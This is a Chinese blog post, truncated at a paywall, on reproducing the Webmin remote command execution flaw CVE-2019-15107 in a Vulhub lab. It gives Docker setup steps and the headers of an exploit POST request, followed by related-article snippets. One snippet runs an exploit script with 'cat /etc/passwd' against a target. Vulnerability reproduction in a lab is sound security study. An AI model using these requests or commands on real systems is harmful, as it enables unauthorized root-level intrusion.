Webmin 远程命令执行漏洞(CVE-2019-15107)复现,python编写POC和EXP

最新推荐文章于 2025-04-09 19:21:27 发布
原创 最新推荐文章于 2025-04-09 19:21:27 发布 · 620 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #安全漏洞 #web安全

本文详细介绍了如何通过Vulhub环境搭建CVE-2019-15107 Webmin漏洞,演示了漏洞复现过程并提供了POC代码。学习者将了解如何构造请求包执行命令,包括使用Python脚本进行exploit和命令执行的示例。

环境搭建:

使用vulhub,进入对应文件夹启动环境:


[root@localhost CVE-2019-15107]# cd /home/vulhub/webmin/CVE-2019-15107/
[root@localhost CVE-2019-15107]# docker-compose up -d

查看端口:

[root@localhost CVE-2019-15107]# docker ps
CONTAINER ID   IMAGE                 COMMAND                  CREATED         STATUS         PORTS                                           NAMES
a6c80145477b   vulhub/webmin:1.910   "/docker-entrypoint.…"   6 minutes ago   Up 6 minutes   0.0.0.0:10000->10000/tcp, :::10000->10000/tcp   cve-2019-15107_web_1

漏洞复现:

执行完成后,访问https://your-ip:10000,忽略证书后即可看到webmin的登录页面。
参考链接中的数据包是不对的,经过阅读代码可知,只有在发送的user参数的值不是已知Linux用户的情况下(而参考链接中是user=root),才会进入到修改/etc/shadow的地方,触发命令注入漏洞。

发送如下数据包,即可执行命令id:

POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
最低0.47元/天 解锁文章
CVE-2022-36446 Webmin命令注入漏洞复现
热爱学习,喜欢折腾!
08-15 4229
Webmin是一款功能强大的基于Web的Unix系统管理工具,管理员可以通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。近日,Webmin被披露存在一个任意命令注入漏洞CVE-2022-36446),其CVSS评分为9.8,目前该漏洞PoC/EXP已公开。Webmin版本1.997之前,由于缺乏输入清理,导致可以注入将连接到包管理器调用的任意命令。经过身份验证且有权访问软件包更新模块的用户可以通过在新软件包安装期间执行 OS 命令注入实现在系统上以 root 权限运行命令。........
vulhub之Webmin
weixin_56306210的博客
04-10 345
vulhub之Webmin
漏洞复现-webmin漏洞系列分析与利用
aming小老弟
05-18 3349
webmin远程命令执行漏洞目标简介漏洞描述漏洞利用条件:漏洞复现构造POC构造EXP漏洞分析被植入后门依据修复建议 目标简介 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作 http://www.webmin.com/ Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。 是一个基于Web的界面,用于Unix的系统管理。 使用任何支持表表单的浏览器,可以设置用户帐户,Apache,DNS,文件共享等。 L
Webmin远程命令执行漏洞(CVE-2019-15107)复现
qq_24481913的博客
08-01 449
Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。
webmin远程命令执行漏洞(cve-2019-15107)深入分析
whatday的专栏
06-27 2406
漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件。 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。 漏洞分析 首先分析msf给出的插件 根据插件,还原出poc如下: 当poc执行后,会向p.
Webmin未经身份验证的远程代码执行(CVE-2019-15107
m0_58606546的博客
01-11 3361
0x01 漏洞详情 Webmin是用于类似Unix的系统的基于Web的系统配置工具。该漏洞存在于密码重置页面中,该页面允许未经身份验证的用户通过简单的POST请求执行任意命令。该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下执行恶意代码,后经知道创宇404实验室发现,该漏洞的存在实则是sourceforge上某些版本的安装包源码被植入了后门导致的。 0x02 影响版本 webmin<=1.920 0x03 漏
Webmin 远程命令执行漏洞CVE-2019-15107复现
weixin_44522540的博客
05-03 875
一、环境搭建 本次采用vulhub进行复现 二、复现过程 POST /password_change.cgi HTTP/1.1 Host: 192.168.252.145:10000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif
webmin 远程命令执行CVE-2019-15107复现
YouthBelief的博客
11-11 1378
Webmin漏洞前言webmin 远程命令执行CVE-2019-15107)0x01 漏洞描述0x02 影响范围0x03 漏洞复现命令执行0x04 漏洞修复 前言 WebminWebmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。 webmin 远程命令执行CVE-2019-15107) 0x01 漏洞描述 Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。 当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无
精选资源
CVE-2019-15642:Webmin远程执行代码(已认证)
03-10
CVE-2019-15642 Webmin远程执行代码(已认证) python用法: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd" Webmin的0x01泊坞窗 cd ~/vulhub/webmin/CVE-2019-15107 docker-compose up -...
Webmin (CVE-2019-15107) 远程命令执行漏洞复现
来日可期的博客
10-13 1740
Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。访问https://127.0.0.1:10000/password_change.cgi。然后发送数据包后,可以看到在页面的回显中,出现了我们插入的id命令的结果。还可以使用HackBar,发送POST请求包,并添加攻击Payload。访问靶场地址https://127.0.0.1:10000/漏洞影响版本为Webmin
CVE-2019-15107
公众号shadow sock7
08-19 1417
漏洞存在于webmin的重置密码功能处,(但是默认重置密码功能并未开启)。只需要用|就可以进行命令执行: shodan上全球有14000多 shodan上中国的只有78 参考: https://blog.firosolutions.com/exploits/webmin/ https://www.reddit.com/r/netsec/comments/crk77z/0day_remote_...
Webmin命令执行(CVE-2020-35606)
m0_65150886的博客
01-31 1059
WebminWebmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。Webmin 1.962版本及之前版本存在安全漏洞,该漏洞允许执行任意命令。任何被授权使用Package Updates模块的用户都可以使用根权限通过包含的向量执行任意命令。账户密码:root:password。使用前注意修改py文件中的121行的目标端口号122行的监听端口号。://ip:port,出现如下页面,开始实验。3.下载exp,并修改文件内容。
CVE-2019-15107 Webmin远程命令执行漏洞复现 (文末EXP
Vitaminapple的博客
06-03 1449
CVE-2019-15107 Webmin远程命令执行漏洞复现 1 环境搭建 1.1 Vulhub靶机搭建 1.1.1 环境安装 (1)安装docker $ curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun (2)安装Docker-Compose $ pip install docker-compose #如果没有pip需要先安装 $ yum -y install epel-release $ yum -y inst
Vulfocus---webmin 远程代码执行 (CVE-2019-15642)
weixin_63124284的博客
10-02 686
Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.920及之前版本中的rpc.cgi文件存在安全漏洞。攻击者可借助特制的对象名称利用该漏洞执行代码。
vulfocus漏洞学习——Webmin 远程代码执行 (CVE-2022-0824)
最新发布
2401_88083440的博客
04-09 1343
Webmin是一套基于Web的用于类Unix操作系统的系统管理工具,提供图形化界面管理工具。漏洞源于Webmin的某些功能模块未能正确验证过滤用户输入,导致攻击者可通过参数注入恶意命令。
CVE-2019-15107 复现Webmin
痴人说梦梦中人
11-13 1056
一、漏洞描述 Webmin的是一个用于管理类Unix的系统的管理配置工具,具有网络页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。它已知在端口10000上运行。在重置密码功能中发现了一个错误,该错误允许恶意第三方由于缺少输入验证而执行恶意代码。影响版本为Webmin<=1.920。 二、环境搭建 下载vulhub、编译运行 # Download project wget https://github.com/vulhub/vulhub/archive
webmin漏洞复现集合
qq_69775412的博客
10-08 2057
webmin漏洞复现集合
漏洞复现------Webmin 远程命令执行漏洞CVE-2019-15107
Z_Grant的博客
09-23 9993
文章目录一,webmin简介二,漏洞概述三,漏洞复现(1)环境搭建(2)exp四,漏洞分析五,漏洞修复 一,webmin简介 什么是webmin Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作 http://www.webmin.com/ Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。 是一...
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值